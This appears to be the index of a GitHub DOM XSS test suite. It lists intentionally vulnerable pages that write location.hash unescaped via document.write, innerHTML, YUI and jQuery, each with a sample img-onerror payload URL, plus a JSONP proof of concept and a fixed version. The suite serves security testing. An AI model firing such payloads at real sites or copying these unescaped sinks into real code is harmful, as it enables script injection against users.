DOM XSS test cases
GitHub Homepage
:
https://github.com/dmitris/domxsstest
document_write_hash.html
- document.write with unfiltered value of location.hash. Sample exploit:
document_write_hash.html#<img src=foo onerror=alert(123)>
innerhtml_hash.html
- assignment from hash to innerHTML. Sample exploit:
innerhtml_hash.html#<img src=foo onerror=alert(123)>
yuinode_hash.html
- YUI's setHTML with location.hash. Sample exploit:
yuinode_hash.html#<img src=bla onerror=alert(123)>
jquery_append_hash.html
- jQuery append with hash. Sample exploit:
jquery_append_hash.html#<img src=foo onerror=alert(123)>
jsonptest.html
- PoC
jsonptest_fixed.html
- a fixed (properly escaped) version